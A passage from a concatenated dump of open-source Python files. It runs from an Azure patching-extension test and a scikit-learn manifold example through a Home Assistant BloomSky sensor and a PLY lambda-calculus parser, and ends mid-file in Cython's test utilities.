current_vmstatustestscript = os.path.join(os.getcwd(), "patch/"+filename)
if os.path.isfile(current_vmstatustestscript):
os.remove(current_vmstatustestscript)
class Test(unittest.TestCase):
def setUp(self):
print('\n\n============================================================================================')
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout')
waagent.Log("%s started to handle." %(ExtensionShortName))
global hutil
hutil = Util.HandlerUtility(waagent.Log, waagent.Error,
ExtensionShortName)
hutil.do_parse_context('TEST')
global MyPatching
MyPatching = FakePatching(hutil)
if MyPatching is None:
sys.exit(1)
distro = DistInfo()[0]
if 'centos' in distro or 'Oracle' in distro or 'redhat' in distro:
MyPatching.cron_restart_cmd = 'service crond restart'
try:
os.remove('mrseq')
except:
pass
waagent.SetFileContents(MyPatching.package_downloaded_path, '')
waagent.SetFileContents(MyPatching.package_patched_path, '')
def test_stop_between_download_and_stage1(self):
print('test_stop_between_download_and_stage1')
global settings
current_time = time.time()
settings = change_settings("startTime", time.strftime('%H:%M', time.localtime(current_time + 180)))
settings = change_settings("category", "importantandrecommended")
old_log_len = len(waagent.GetFileContents(log_file))
delta_time = int(time.strftime('%S', time.localtime(current_time + 120)))
with self.assertRaises(SystemExit) as cm:
enable()
self.assertEqual(cm.exception.code, 0)
# set stop flag after downloaded 40 seconds
time.sleep(160 - delta_time)
os.remove('mrseq')
settings = change_settings("stop", "true")
with self.assertRaises(SystemExit) as cm:
enable()
self.assertEqual(cm.exception.code, 0)
self.assertTrue(MyPatching.exists_stop_flag())
# Make sure the total sleep time is greater than 180s
time.sleep(20 + delta_time + 5 + 60)
self.assertFalse(MyPatching.exists_stop_flag())
download_list = get_patch_list(MyPatching.package_downloaded_path)
self.assertEqual(download_list, ['a', 'b', 'c', 'd', 'e', '1', '2', '3', '4'])
self.assertFalse(waagent.GetFileContents(MyPatching.package_patched_path))
log_contents = waagent.GetFileContents(log_file)[old_log_len:]
self.assertTrue('Installing patches is stopped/canceled' in log_contents)
restore_settings()
def test_stop_between_stage1_and_stage2(self):
print 'test_stop_between_stage1_and_stage2'
global settings
current_time = time.time()
settings = change_settings("startTime", time.strftime('%H:%M', time.localtime(current_time + 180)))
settings = change_settings("category", "importantandrecommended")
old_log_len = len(waagent.GetFileContents(log_file))
delta_time = int(time.strftime('%S', time.localtime(current_time)))
with self.assertRaises(SystemExit) as cm:
enable()
self.assertEqual(cm.exception.code, 0)
# Set stop flag after patched 10 seconds
# Meanwhile the extension is sleeping between stage 1 & 2
time.sleep(180 - delta_time + 10)
os.remove('mrseq')
settings = change_settings("stop", "true")
with self.assertRaises(SystemExit) as cm:
enable()
self.assertEqual(cm.exception.code, 0)
self.assertTrue(MyPatching.exists_stop_flag())
# The patching (stage 1 & 2) has ended
time.sleep(20)
self.assertFalse(MyPatching.exists_stop_flag())
download_list = get_patch_list(MyPatching.package_downloaded_path)
self.assertEqual(download_list, ['a', 'b', 'c', 'd', 'e', '1', '2', '3', '4'])
patch_list = get_patch_list(MyPatching.package_patched_path)
self.assertEqual(patch_list, ['a', 'b', 'c', 'd', 'e'])
log_contents = waagent.GetFileContents(log_file)[old_log_len:]
self.assertTrue("Installing patches (Category:" + MyPatching.category_all + ") is stopped/canceled" in log_contents)
restore_settings()
def get_patch_list(file_path, category = None):
content = waagent.GetFileContents(file_path)
if category != None:
result = [line.split()[0] for line in content.split('\n') if line.endswith(category)]
else:
result = [line.split()[0] for line in content.split('\n') if ' ' in line]
return result
def get_status(operation, retkey='status'):
contents = waagent.GetFileContents(status_file)
status = json.loads(contents)[0]['status']
if status['operation'] == operation:
return status[retkey]
return ''
def change_settings(key, value):
with open(settings_file, "r") as f:
settings_string = f.read()
settings = json.loads(settings_string)
with open(settings_file, "w") as f:
settings[key] = value
settings_string = json.dumps(settings)
f.write(settings_string)
return settings
def restore_settings():
idleTestScriptLocal = """#!/usr/bin/python
# Locally.
def is_vm_idle():
return True
"""
healthyTestScriptLocal = """#!/usr/bin/python
# Locally.
def is_vm_healthy():
return True
"""
settings = {
"disabled" : "false",
"stop" : "false",
"rebootAfterPatch" : "rebootifneed",
"category" : "important",
"installDuration" : "00:30",
"oneoff" : "false",
"intervalOfWeeks" : "1",
"dayOfWeek" : "everyday",
"startTime" : "03:00",
"vmStatusTest" : {
"local" : "true",
"idleTestScript" : idleTestScriptLocal, #idleTestScriptStorage,
"healthyTestScript" : healthyTestScriptLocal, #healthyTestScriptStorage
},
"storageAccountName" : "<TOCHANGE>",
"storageAccountKey" : "<TOCHANGE>"
}
settings_string = json.dumps(settings)
settings_file = "default.settings"
with open(settings_file, "w") as f:
f.write(settings_string)
def main():
if len(sys.argv) == 1:
unittest.main()
return
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout')
waagent.Log("%s started to handle." % ExtensionShortName)
global hutil
hutil = Util.HandlerUtility(waagent.Log, waagent.Error,
ExtensionShortName)
hutil.do_parse_context('TEST')
global MyPatching
MyPatching = FakePatching(hutil)
if MyPatching is None:
sys.exit(1)
for a in sys.argv[1:]:
if re.match("^([-/]*)(disable)", a):
disable()
elif re.match("^([-/]*)(uninstall)", a):
uninstall()
elif re.match("^([-/]*)(install)", a):
install()
elif re.match("^([-/]*)(enable)", a):
enable()
elif re.match("^([-/]*)(update)", a):
update()
elif re.match("^([-/]*)(download)", a):
download()
elif re.match("^([-/]*)(patch)", a):
patch()
elif re.match("^([-/]*)(oneoff)", a):
oneoff()
if __name__ == '__main__':
main()
| apache-2.0 |
garywong89/PetStoreAPI | python/swagger_client/__init__.py | 1 | 2217 | # coding: utf-8
"""
DeliveryHub
DeliveryHub API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
# import models into sdk package
from .models.account import Account
from .models.account_role import AccountRole
from .models.account_status import AccountStatus
from .models.agent import Agent
from .models.agent_billing import AgentBilling
from .models.agent_fleet import AgentFleet
from .models.agent_type import AgentType
from .models.area import Area
from .models.auth_credentials import AuthCredentials
from .models.auth_pin import AuthPin
from .models.auth_token import AuthToken
from .models.callback_uri import CallbackUri
from .models.city import City
from .models.coordinates import Coordinates
from .models.country import Country
from .models.country_code import CountryCode
from .models.date_time import DateTime
from .models.email import Email
from .models.merchant import Merchant
from .models.mobile_phone import MobilePhone
from .models.new_status import NewStatus
from .models.object_id import ObjectId
from .models.order import Order
from .models.order_details import OrderDetails
from .models.order_details_items import OrderDetailsItems
from .models.schedule import Schedule
from .models.shop import Shop
from .models.street_address import StreetAddress
from .models.team import Team
from .models.time_zone import TimeZone
# import apis into sdk package
from .apis.default_api import DefaultApi
# import ApiClient
from .api_client import ApiClient
from .configuration import Configuration
configuration = Configuration()
| apache-2.0 |
siutanwong/scikit-learn | examples/manifold/plot_manifold_sphere.py | 258 | 5101 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=============================================
Manifold Learning methods on a severed sphere
=============================================
An application of the different :ref:`manifold` techniques
on a spherical data-set. Here one can see the use of
dimensionality reduction in order to gain some intuition
regarding the manifold learning methods. Regarding the dataset,
the poles are cut from the sphere, as well as a thin slice down its
side. This enables the manifold learning techniques to
'spread it open' whilst projecting it onto two dimensions.
For a similar example, where the methods are applied to the
S-curve dataset, see :ref:`example_manifold_plot_compare_methods.py`
Note that the purpose of the :ref:`MDS <multidimensional_scaling>` is
to find a low-dimensional representation of the data (here 2D) in
which the distances respect well the distances in the original
high-dimensional space, unlike other manifold-learning algorithms,
it does not seeks an isotropic representation of the data in
the low-dimensional space. Here the manifold problem matches fairly
that of representing a flat map of the Earth, as with
`map projection <http://en.wikipedia.org/wiki/Map_projection>`_
"""
# Author: Jaques Grobler <jaques.grobler@inria.fr>
# License: BSD 3 clause
print(__doc__)
from time import time
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import NullFormatter
from sklearn import manifold
from sklearn.utils import check_random_state
# Next line to silence pyflakes.
Axes3D
# Variables for manifold learning.
n_neighbors = 10
n_samples = 1000
# Create our sphere.
random_state = check_random_state(0)
p = random_state.rand(n_samples) * (2 * np.pi - 0.55)
t = random_state.rand(n_samples) * np.pi
# Sever the poles from the sphere.
indices = ((t < (np.pi - (np.pi / 8))) & (t > ((np.pi / 8))))
colors = p[indices]
x, y, z = np.sin(t[indices]) * np.cos(p[indices]), \
np.sin(t[indices]) * np.sin(p[indices]), \
np.cos(t[indices])
# Plot our dataset.
fig = plt.figure(figsize=(15, 8))
plt.suptitle("Manifold Learning with %i points, %i neighbors"
% (1000, n_neighbors), fontsize=14)
ax = fig.add_subplot(251, projection='3d')
ax.scatter(x, y, z, c=p[indices], cmap=plt.cm.rainbow)
try:
# compatibility matplotlib < 1.0
ax.view_init(40, -10)
except:
pass
sphere_data = np.array([x, y, z]).T
# Perform Locally Linear Embedding Manifold learning
methods = ['standard', 'ltsa', 'hessian', 'modified']
labels = ['LLE', 'LTSA', 'Hessian LLE', 'Modified LLE']
for i, method in enumerate(methods):
t0 = time()
trans_data = manifold\
.LocallyLinearEmbedding(n_neighbors, 2,
method=method).fit_transform(sphere_data).T
t1 = time()
print("%s: %.2g sec" % (methods[i], t1 - t0))
ax = fig.add_subplot(252 + i)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("%s (%.2g sec)" % (labels[i], t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
# Perform Isomap Manifold learning.
t0 = time()
trans_data = manifold.Isomap(n_neighbors, n_components=2)\
.fit_transform(sphere_data).T
t1 = time()
print("%s: %.2g sec" % ('ISO', t1 - t0))
ax = fig.add_subplot(257)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("%s (%.2g sec)" % ('Isomap', t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
# Perform Multi-dimensional scaling.
t0 = time()
mds = manifold.MDS(2, max_iter=100, n_init=1)
trans_data = mds.fit_transform(sphere_data).T
t1 = time()
print("MDS: %.2g sec" % (t1 - t0))
ax = fig.add_subplot(258)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("MDS (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
# Perform Spectral Embedding.
t0 = time()
se = manifold.SpectralEmbedding(n_components=2,
n_neighbors=n_neighbors)
trans_data = se.fit_transform(sphere_data).T
t1 = time()
print("Spectral Embedding: %.2g sec" % (t1 - t0))
ax = fig.add_subplot(259)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("Spectral Embedding (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
# Perform t-distributed stochastic neighbor embedding.
t0 = time()
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0)
trans_data = tsne.fit_transform(sphere_data).T
t1 = time()
print("t-SNE: %.2g sec" % (t1 - t0))
ax = fig.add_subplot(250)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("t-SNE (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
plt.show()
| bsd-3-clause |
f-guichard/cf-sample-php-buildpack-custo | lib/yaml/nodes.py | 985 | 1440 |
class Node(object):
def __init__(self, tag, value, start_mark, end_mark):
self.tag = tag
self.value = value
self.start_mark = start_mark
self.end_mark = end_mark
def __repr__(self):
value = self.value
#if isinstance(value, list):
# if len(value) == 0:
# value = '<empty>'
# elif len(value) == 1:
# value = '<1 item>'
# else:
# value = '<%d items>' % len(value)
#else:
# if len(value) > 75:
# value = repr(value[:70]+u' ... ')
# else:
# value = repr(value)
value = repr(value)
return '%s(tag=%r, value=%s)' % (self.__class__.__name__, self.tag, value)
class ScalarNode(Node):
id = 'scalar'
def __init__(self, tag, value,
start_mark=None, end_mark=None, style=None):
self.tag = tag
self.value = value
self.start_mark = start_mark
self.end_mark = end_mark
self.style = style
class CollectionNode(Node):
def __init__(self, tag, value,
start_mark=None, end_mark=None, flow_style=None):
self.tag = tag
self.value = value
self.start_mark = start_mark
self.end_mark = end_mark
self.flow_style = flow_style
class SequenceNode(CollectionNode):
id = 'sequence'
class MappingNode(CollectionNode):
id = 'mapping'
| apache-2.0 |
Khusbu/company-api-svc | vendor/github.com/ugorji/go/codec/test.py | 107 | 4029 | #!/usr/bin/env python
# This will create golden files in a directory passed to it.
# A Test calls this internally to create the golden files
# So it can process them (so we don't have to checkin the files).
# Ensure msgpack-python and cbor are installed first, using:
# sudo apt-get install python-dev
# sudo apt-get install python-pip
# pip install --user msgpack-python msgpack-rpc-python cbor
# Ensure all "string" keys are utf strings (else encoded as bytes)
import cbor, msgpack, msgpackrpc, sys, os, threading
def get_test_data_list():
# get list with all primitive types, and a combo type
l0 = [
-8,
-1616,
-32323232,
-6464646464646464,
192,
1616,
32323232,
6464646464646464,
192,
-3232.0,
-6464646464.0,
3232.0,
6464.0,
6464646464.0,
False,
True,
u"null",
None,
u"some&day>some<day",
1328176922000002000,
u"",
-2206187877999998000,
u"bytestring",
270,
u"none",
-2013855847999995777,
#-6795364578871345152,
]
l1 = [
{ "true": True,
"false": False },
{ "true": u"True",
"false": False,
"uint16(1616)": 1616 },
{ "list": [1616, 32323232, True, -3232.0, {"TRUE":True, "FALSE":False}, [True, False] ],
"int32":32323232, "bool": True,
"LONG STRING": u"123456789012345678901234567890123456789012345678901234567890",
"SHORT STRING": u"1234567890" },
{ True: "true", 138: False, "false": 200 }
]
l = []
l.extend(l0)
l.append(l0)
l.append(1)
l.extend(l1)
return l
def build_test_data(destdir):
l = get_test_data_list()
for i in range(len(l)):
# packer = msgpack.Packer()
serialized = msgpack.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.msgpack.golden'), 'wb')
f.write(serialized)
f.close()
serialized = cbor.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.cbor.golden'), 'wb')
f.write(serialized)
f.close()
def doRpcServer(port, stopTimeSec):
class EchoHandler(object):
def Echo123(self, msg1, msg2, msg3):
return ("1:%s 2:%s 3:%s" % (msg1, msg2, msg3))
def EchoStruct(self, msg):
return ("%s" % msg)
addr = msgpackrpc.Address('localhost', port)
server = msgpackrpc.Server(EchoHandler())
server.listen(addr)
# run thread to stop it after stopTimeSec seconds if > 0
if stopTimeSec > 0:
def myStopRpcServer():
server.stop()
t = threading.Timer(stopTimeSec, myStopRpcServer)
t.start()
server.start()
def doRpcClientToPythonSvc(port):
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("Echo123", "A1", "B2", "C3")
print client.call("EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doRpcClientToGoSvc(port):
# print ">>>> port: ", port, " <<<<<"
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("TestRpcInt.Echo123", ["A1", "B2", "C3"])
print client.call("TestRpcInt.EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doMain(args):
if len(args) == 2 and args[0] == "testdata":
build_test_data(args[1])
elif len(args) == 3 and args[0] == "rpc-server":
doRpcServer(int(args[1]), int(args[2]))
elif len(args) == 2 and args[0] == "rpc-client-python-service":
doRpcClientToPythonSvc(int(args[1]))
elif len(args) == 2 and args[0] == "rpc-client-go-service":
doRpcClientToGoSvc(int(args[1]))
else:
print("Usage: test.py " +
"[testdata|rpc-server|rpc-client-python-service|rpc-client-go-service] ...")
if __name__ == "__main__":
doMain(sys.argv[1:])
| mit |
lckung/spark-ec2 | launch-script/lib/boto-2.34.0/boto/sqs/batchresults.py | 191 | 3515 | # Copyright (c) 2011 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2011 Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
A set of results returned by SendMessageBatch.
"""
class ResultEntry(dict):
"""
The result (successful or unsuccessful) of a single
message within a send_message_batch request.
In the case of a successful result, this dict-like
object will contain the following items:
:ivar id: A string containing the user-supplied ID of the message.
:ivar message_id: A string containing the SQS ID of the new message.
:ivar message_md5: A string containing the MD5 hash of the message body.
In the case of an error, this object will contain the following
items:
:ivar id: A string containing the user-supplied ID of the message.
:ivar sender_fault: A boolean value.
:ivar error_code: A string containing a short description of the error.
:ivar error_message: A string containing a description of the error.
"""
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Id':
self['id'] = value
elif name == 'MessageId':
self['message_id'] = value
elif name == 'MD5OfMessageBody':
self['message_md5'] = value
elif name == 'SenderFault':
self['sender_fault'] = value
elif name == 'Code':
self['error_code'] = value
elif name == 'Message':
self['error_message'] = value
class BatchResults(object):
"""
A container for the results of a send_message_batch request.
:ivar results: A list of successful results. Each item in the
list will be an instance of :class:`ResultEntry`.
:ivar errors: A list of unsuccessful results. Each item in the
list will be an instance of :class:`ResultEntry`.
"""
def __init__(self, parent):
self.parent = parent
self.results = []
self.errors = []
def startElement(self, name, attrs, connection):
if name.endswith('MessageBatchResultEntry'):
entry = ResultEntry()
self.results.append(entry)
return entry
if name == 'BatchResultErrorEntry':
entry = ResultEntry()
self.errors.append(entry)
return entry
return None
def endElement(self, name, value, connection):
setattr(self, name, value)
| apache-2.0 |
laemp/gruschen | gruschen/metrics/dynamic_time_warping.py | 2 | 1226 | import math
import numpy as np
# dynamic time warping - squared
def get_metric(s, t):
return _get_dtw_matrix(s, t, _point_cost_sqr)[-1, -1]
def _get_dtw_matrix(s, t, point_norm):
n = len(s)
m = len(t)
dtw = np.empty((n, m))
cost = np.empty(m)
row = np.empty(m)
_cost_vector(cost, s[0], t, point_norm)
dtw[0, 0] = cost[0]
for i in range(1, m):
dtw[0, i] = dtw[0, i-1] + cost[i]
for i in range(1, n):
dtw[i, 0] = point_norm(s[i] - t[0]) + dtw[i-1, 0]
for i in range(1, n):
row = dtw[i, :]
_cost_vector(cost, s[i], t[1:], point_norm)
_row_prediction(row, cost, dtw[i-1, :])
_row_adjustment(row, cost)
return dtw
def _point_cost_sqr(v):
return np.inner(v, v)
def _cost_vector(cost, ref, mov, point_norm):
for i in range(len(mov)):
diff = ref - mov[i]
cost[i] = point_norm(diff)
def _row_prediction(row, cost, prev_row):
for i in range(1, len(row)):
row[i] = cost[i-1] + min(prev_row[i-1], prev_row[i])
def _row_adjustment(row, cost):
for j in range(1, len(row)):
if row[j-1] + cost[j-1] < row[j]: # is true more often than not
row[j] = row[j-1] + cost[j-1]
| mit |
PetePriority/home-assistant | homeassistant/components/bloomsky/sensor.py | 4 | 3092 | """
Support the sensor of a BloomSky weather station.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/sensor.bloomsky/
"""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (TEMP_FAHRENHEIT, CONF_MONITORED_CONDITIONS)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['bloomsky']
# These are the available sensors
SENSOR_TYPES = ['Temperature',
'Humidity',
'Pressure',
'Luminance',
'UVIndex',
'Voltage']
# Sensor units - these do not currently align with the API documentation
SENSOR_UNITS = {'Temperature': TEMP_FAHRENHEIT,
'Humidity': '%',
'Pressure': 'inHg',
'Luminance': 'cd/m²',
'Voltage': 'mV'}
# Which sensors to format numerically
FORMAT_NUMBERS = ['Temperature', 'Pressure', 'Voltage']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_MONITORED_CONDITIONS, default=SENSOR_TYPES):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the available BloomSky weather sensors."""
bloomsky = hass.components.bloomsky
# Default needed in case of discovery
sensors = config.get(CONF_MONITORED_CONDITIONS, SENSOR_TYPES)
for device in bloomsky.BLOOMSKY.devices.values():
for variable in sensors:
add_entities(
[BloomSkySensor(bloomsky.BLOOMSKY, device, variable)], True)
class BloomSkySensor(Entity):
"""Representation of a single sensor in a BloomSky device."""
def __init__(self, bs, device, sensor_name):
"""Initialize a BloomSky sensor."""
self._bloomsky = bs
self._device_id = device['DeviceID']
self._sensor_name = sensor_name
self._name = '{} {}'.format(device['DeviceName'], sensor_name)
self._state = None
self._unique_id = '{}-{}'.format(self._device_id, self._sensor_name)
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def name(self):
"""Return the name of the BloomSky device and this sensor."""
return self._name
@property
def state(self):
"""Return the current state, eg. value, of this sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the sensor units."""
return SENSOR_UNITS.get(self._sensor_name, None)
def update(self):
"""Request an update from the BloomSky API."""
self._bloomsky.refresh_devices()
state = \
self._bloomsky.devices[self._device_id]['Data'][self._sensor_name]
if self._sensor_name in FORMAT_NUMBERS:
self._state = '{0:.2f}'.format(state)
else:
self._state = state
| apache-2.0 |
habibutsu/tapl-py | rcdsubbot/parser.py | 1 | 7288 | import ply.yacc as yacc
from lexer import Lexer
import syntax
"""
Commands
: Command SEMI
| Command SEMI Commands
Command
: Term
| LCID Binder
Binder
: COLON Type
PathTerm : PathTerm DOT LCID
| PathTerm DOT INTV
| ATerm
Type
: ArrowType
AType : LPAREN Type RPAREN
| LCURLY FieldTypes RCURLY
| TTOP
| TBOT
FieldTypes :
| NEFieldTypes
NEFieldTypes:
| FieldType
| FieldType COMMA NEFieldTypes
FieldType : LCID COLON Type
| Type
ArrowType : AType ARROW ArrowType
| AType
Term
: AppTerm
| LAMBDA LCID COLON Type new_scope DOT Term end_scope
| LAMBDA USCORE COLON Type new_scope DOT Term end_scope
AppTerm
: PathTerm
| AppTerm PathTerm
ATerm
: LPAREN Term RPAREN
| LCID
| LCURLY Fields RCURLY
Fields
:
| NEFields
NEFields
: Field
| Field COMMA NEFields
Field
: LCID EQ Term
| Term
"""
class Parser:
def __init__(self, debug=False):
self.lexer = Lexer()
self.tokens = self.lexer.tokens
self.debug = debug
self.parser = yacc.yacc(module=self, debug=debug)
def parse(self, text, filename=""):
self._ctx = []
self._scope_comma_cnt = []
self.filename = filename
return self.parser.parse(
text, debug=self.debug, lexer=self.lexer.lexer, tracking=True)
# Commands
def p_Commands_Command(self, p):
"Commands : Command SEMI"
p[0] = [p[1]]
def p_Commands_Command_Commands(self, p):
"Commands : Command SEMI Commands"
p[0] = [p[1]] + p[3]
# Command
def p_Command_LCID_Binder(self, p):
"Command : LCID Binder"
self.addbinding(p[1], p[2])
p[0] = syntax.Bind(self._info(p), p[1], p[2])
def p_Command_Term(self, p):
"Command : Term"
p[0] = syntax.Eval(self._info(p), p[1])
# Binder
def p_Binder_COLON_Type(self, p):
"Binder : COLON Type"
p[0] = syntax.VarBind(p[2])
# Type
def p_Type_ArrowType(self, p):
"Type : ArrowType"
p[0] = p[1]
# AType
def p_AType_Complex(self, p):
"AType : LPAREN Type RPAREN"
p[0] = p[2]
def p_AType_LCURLY_FieldTypes_RCURLY(self, p):
"AType : LCURLY AType_LCURLY FieldTypes RCURLY AType_RCURLY"
p[0] = syntax.TyRecord(p[3])
def p_AType_TTOP(self, p):
"AType : TTOP"
p[0] = syntax.TyTop()
def p_AType_TBOT(self, p):
"AType : TBOT"
p[0] = syntax.TyBot()
# Helper functions
def p_AType_LCURLY(self, p):
"AType_LCURLY :"
self._scope_comma_cnt.append(0)
def p_AType_RCURLY(self, p):
"AType_RCURLY :"
self._scope_comma_cnt.pop()
# FieldTypes
def p_FieldTypes(self, p):
"FieldTypes : "
p[0] = []
def p_FieldTypes_NEFieldTypes(self, p):
"FieldTypes : NEFieldTypes"
p[0] = p[1]
# NEFieldTypes
def p_NEFieldTypes_FieldType(self, p):
"NEFieldTypes : FieldType"
p[0] = [p[1]]
def p_NEFieldTypes_FieldType_COMMA_NEFieldTypes(self, p):
"NEFieldTypes : FieldType COMMA FieldType_comma NEFieldTypes"
p[4].append(p[1])
p[0] = p[4]
def p_FieldType_comma(self, p):
"FieldType_comma :"
self._scope_comma_cnt[-1] += 1
# FieldType
def p_FieldType_LCID_COLON_Type(self, p):
"FieldType : LCID COLON Type"
p[0] = (p[1], p[3])
def p_FieldType_Type(self, p):
"FieldType : Type"
i = self._scope_comma_cnt[-1]
p[0] = (i+1, p[1])
# ArrowType
def p_ArrowType_Arrow(self, p):
"ArrowType : AType ARROW ArrowType"
p[0] = syntax.TyArr(p[1], p[3])
def p_ArrowType_AType(self, p):
"ArrowType : AType"
p[0] = p[1]
# Term
def p_Term_AppTerm(self, p):
"Term : AppTerm"
p[0] = p[1]
def p_Term_LAMBDA_LCID(self, p):
"Term : LAMBDA LCID COLON Type lambda_new_scope DOT Term lambda_end_scope"
p[0] = syntax.TmAbs(
self._info(p), p[2], p[4], p[7])
def p_Term_LAMBDA_USCORE(self, p):
"Term : LAMBDA USCORE COLON Type lambda_new_scope DOT Term lambda_end_scope"
p[0] = syntax.TmAbs(self._info(p), "_", p[4], p[7])
def p_lambda_new_scope(self, p):
"lambda_new_scope :"
self.addname(p[-3])
def p_lambda_end_scope(self, p):
"lambda_end_scope :"
self._ctx.pop()
# AppTerm
def p_AppTerm_PathTerm(self, p):
"AppTerm : PathTerm"
p[0] = p[1]
def p_AppTerm_AppTerm_PathTerm(self, p):
"AppTerm : AppTerm PathTerm"
p[0] = syntax.TmApp(self._info(p), p[1], p[2])
# PathTerm
def p_PathTerm_DOT_LCID(self, p):
"PathTerm : PathTerm DOT LCID"
p[0] = syntax.TmProj(self._info(p), p[1], p[3])
def p_PathTerm_DOT_INTV(self, p):
"PathTerm : PathTerm DOT INTV"
p[0] = syntax.TmProj(self._info(p), p[1], int(p[3]))
def p_PathTerm_Aterm(self, p):
"PathTerm : ATerm"
p[0] = p[1]
# ATerm
def p_ATerm_Term(self, p):
"ATerm : LPAREN Term RPAREN"
p[0] = p[2]
def p_ATerm_LCID(self, p):
"ATerm : LCID"
p[0] = syntax.TmVar(
self._info(p),
self.name2index(p[1]),
len(self._ctx))
def p_ATerm_Fields(self, p):
"ATerm : LCURLY ATerm_LCURLY Fields RCURLY ATerm_RCURLY"
p[0] = syntax.TmRecord(self._info(p), p[3])
# Helpers
def p_ATerm_LCURLY(self, p):
"ATerm_LCURLY :"
self._scope_comma_cnt.append(0)
def p_ATerm_RCURLY(self, p):
"ATerm_RCURLY :"
self._scope_comma_cnt.pop()
# Fields
def p_Fields(self, p):
"Fields :"
p[0] = []
def p_Fields_NEFields(self, p):
"Fields : NEFields"
p[0] = p[1]
# NEFields
def p_NEFields_Field(self, p):
"NEFields : Field"
p[0] = [p[1]]
def p_NEFields_Field_COMMA_NEFields(self, p):
"NEFields : Field COMMA Field_comma NEFields"
p[4].append(p[1])
p[0] = p[4]
def p_Field_comma(self, p):
"Field_comma : "
self._scope_comma_cnt[-1] += 1
# Field
def p_Field_LCID_EQ_Term(self, p):
"Field : LCID EQ Term"
p[0] = (p[1], p[3])
def p_Field_Term(self, p):
"Field : Term"
i = self._scope_comma_cnt[-1]
p[0] = (i+1, p[1])
# Common helper functions
def p_error(self, p):
self._error("Syntax error", self._info(p))
def _error(self, msg, info):
raise SystemError(msg, info)
def addbinding(self, name, bind):
syntax.addbinding(self._ctx, name, bind)
def addname(self, name):
self.addbinding(name, syntax.NameBind())
def isnamebound(self, name):
return syntax.isnamebound(self._ctx, name)
def name2index(self, name):
return syntax.name2index(self._ctx, name)
def _info(self, p):
return syntax.Info(self.filename, p.lineno(1))
| mit |
mcanthony/cython | Cython/TestUtils.py | 13 | 7698 | import Cython.Compiler.Errors as Errors
from Cython.CodeWriter import CodeWriter
from Cython.Compiler.TreeFragment import TreeFragment, strip_common_indent
from Cython.Compiler.Visitor import TreeVisitor, VisitorTransform
from Cython.Compiler import TreePath
import unittest
import os, sys
import tempfile
class NodeTypeWriter(TreeVisitor):
def __init__(self):
super(NodeTypeWriter, self).__init__()
self._indents = 0
self.result = []
def visit_Node(self, node):
if not self.access_path:
name = u"(root)"
else:
tip = self.access_path[-1]
if tip[2] is not None:
name = u"%s[%d]" % tip[1:3]
else:
name = tip[1]
